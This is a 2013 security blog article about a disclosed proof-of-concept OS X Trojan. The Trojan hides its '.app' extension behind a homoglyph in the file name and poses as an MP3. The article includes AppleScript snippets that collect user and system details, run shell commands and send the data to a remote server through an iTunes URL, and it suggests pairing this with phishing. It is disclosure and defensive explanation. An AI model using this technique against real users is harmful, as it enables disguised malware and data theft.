Building OS X Trojans With AppleScript, Homoglyphs and iTunes

Saturday, September 21, 2013

Tripwire Inc

Bd07d58f0d31d48d3764821d109bf165

Article by Ken Westin

A recent report is stating that a Mac based Trojan attributed to the Syrian Electronic Army (SEA) was discovered, although not a lot of information regarding the malware has been provided, it should be noted that creating a Trojan for Mac OS X is not particularly difficult.

A year or so ago I stumbled upon a way to create Trojans for OS X by utilizing homoglyphs and a bit of social engineering, I disclosed the vulnerability to Apple and presented it at ToorCamp.

I was able to show how it is  possible to create an binary that appears to the end user as a harmless file such as an MP3 file or image.

For my proof of concept I used AppleScript, as it is not only an easy way to create a Mac app, but also has hooks into all of the native Mac apps making it easy to control these applications for malicious purposes.

For a proof of concept I created an Applescript application that gathers information from the system, runs some shell scripts and then passes data from the device through iTunes to a remote server.

Creating the app was one thing, making it so that it tricked someone into clicking it was another. By default applications hide the “.app” extension on Macs¸ I wanted to disguise my Trojan as an MP3 so figured I could just change my file name to “.mp3,” however when you do this OS X knows you are up to no good and will then make the “.app” visible after your “.mp3″ alerting users to the fact that this file is in fact an application and not an MP3.

However this behavior only occurs with a period. As a workaround I found that if I use a Unicode character that appears similar to a period, OS X does not make the “.app” visible. I found a Turkish character called and ogonek (“¸”) that looks close enough to a period to fool most people using the default OS X system font:

OS X Filename Hack

I then changed the icon of my application to the standard MP3 icon and the disguise was complete. When the file is double clicked it would open iTunes and pass a URL with data encoded in the query string to a remote server where I logged the data collected from my semi-willing test victims.

The server would then stream the MP3 they were expecting to hear back through iTunes so they would not suspect what was happening on the back end. Using Applescript I was able to access pretty much all native OS X applications including iLife and iWork, as well as run shell scripts under whatever permissions the user had:

...
tell application "iTunes" 
	activate
	try
		open location trackingURLdata
	end try
end tell

do shell script "{insert shell commands of your choice}"
...

There is also a “sysinfo” object available in Applescript that provides extensive information about the system and user account that is easy to access:

set sysinfo to (system info) as record
set uname to long user name of sysinfo
set user to short user name of sysinfo
set cname to computer name of sysinfo
set sip to IPv4 address of sysinfo

To Apple’s credit they made “DeveloperID and Gatekeeper” available as of Mountain Lion which helps to mitigate the risk of this particular attack, but only if it is enabled:

OS X Gatekeeper

However, once unidentified applications were enabled on the device the Trojan worked perfectly. Older versions of OS X, Lion (10.7) and earlier do not have Gatekeeper and so will run the Trojan without error.

If the file is downloaded from the Internet a warning may appear telling the user the file was downloaded from the Internet, but I found the most people did not care and just clicked through without giving it another thought.

Utilizing a Mac Trojan in combination with a phishing attack would allow the attacker to sniff the version of OS X the user is running on the server and could swap out files based on those susceptible to it.

Cross Posted from Tripwire's State of Security

Possibly Related Articles:
11441
Viruses & Malware
malware Mac OS X trojan AppleScript homoglyphs
Post Rating I Like this!
Default-avatar
James Anderson No doubt that you can't cure stupid. If a person does not care about the alert/warning, then it is a problem. Question, how would you solve the problem of users circumventing a plain warning and an unexpected data file running as an executable?
1379946469
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.